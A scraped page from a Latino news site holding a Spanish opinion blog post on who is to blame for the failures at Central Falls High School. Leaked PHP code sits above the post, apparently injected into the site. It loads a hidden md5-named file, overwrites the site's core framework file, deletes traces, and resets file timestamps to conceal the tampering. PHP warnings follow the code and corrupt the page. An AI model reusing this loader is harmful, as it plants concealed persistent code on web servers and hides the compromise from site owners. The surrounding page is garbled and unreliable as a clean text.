$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home4/acontece/public_html/includes/framework.php:92) in /home4/acontece/public_html/libraries/joomla/session/session.php on line 426
Falla del equipo docente y de liderazgo también

ACONTECER LATINO

Tuesday, Sep 19th

Ultima actualizacion:06:42:24 AM GMT

Estas en: EXTRA! > BLOGS > Luis Peralta > Falla del equipo docente y de liderazgo también

Falla del equipo docente y de liderazgo también

Imprimir PDF

altHe oído mucho acerca de los altos niveles de irresponsabilidad y falta de compromiso atribuidos al personal docente de Central Falls High School. Su situación, como la de la escuela en sí es debatida en la prensa diariamente, y todo lo que sale es devastadoramente crítico; hablan como de una especie de demonios sin corazón, sin intelecto, incapaces de pre-ocuparse del bienestar de los estudiantes.

¿Será que todo eso es cierto? Y de ser así, ¿cómo explicar que CFHS durara tanto tiempo sin ser enfrentada por los sucesivos liderazgos, incluyendo la oficina regente a nivel estatal?

Si el personal de una escuela no funciona, o no sirve para nada, ¿podría alguien decirme cuál es el nivel de responsabilidad del liderazgo inmediato, y de los más encumbrados representantes del sistema al que esa escuela pertenece?

No intento decir que no existen cosas fuera de lugar en el equipo docente de Central Falls High School; pero sí quiero afirmar que ha habido una falla interminable a nivel de las administraciones que el distrito escolar ha tenido, con lo cual no necesariamente afirmo que haya sido responsabilidad de la actual administración.

Lo que sí digo es que la situación se ha venido manejando de un modo “político”, y el hecho mismo de llevarla de soslayo a los medios de opinión, no ha hecho sino poner mayor presión en los maestros, que han soportado una campaña inmisericorde de ataques y descalificativos.

Finalmente, he visto dos intentos recientes que me parecen altamente positivos; uno, el acercamiento de la Comisionada de Educación, y dos, el nombramiento de Patricia Martínez como parte del equipo que lidera los esfuerzos de reforma en Central Falls High School. La Comisionada dio un paso importantísimo, yendo personalmente a “conversar”  con los maestros. Esto me permite pensar que ella profundizará en la raíz del problema.

Sin embargo, pienso que las personas responsables de la tarea reformadora, deben cambiar de estrategia, y comenzar a trabajar más de cerca con maestros y padres; reducir la dosis de activismo y publicitación negativa, que no hacen sino generar actitudes adversas a lo esperado.  Se puede trabajar junto, pero cada quien debe reconocer su responsabilidad y compromiso.

Algunos cabos fueron atados con firmeza; otros, permanecen sueltos, y tal vez la acción de ajustarlos, sea una responsabilidad compartida.

alt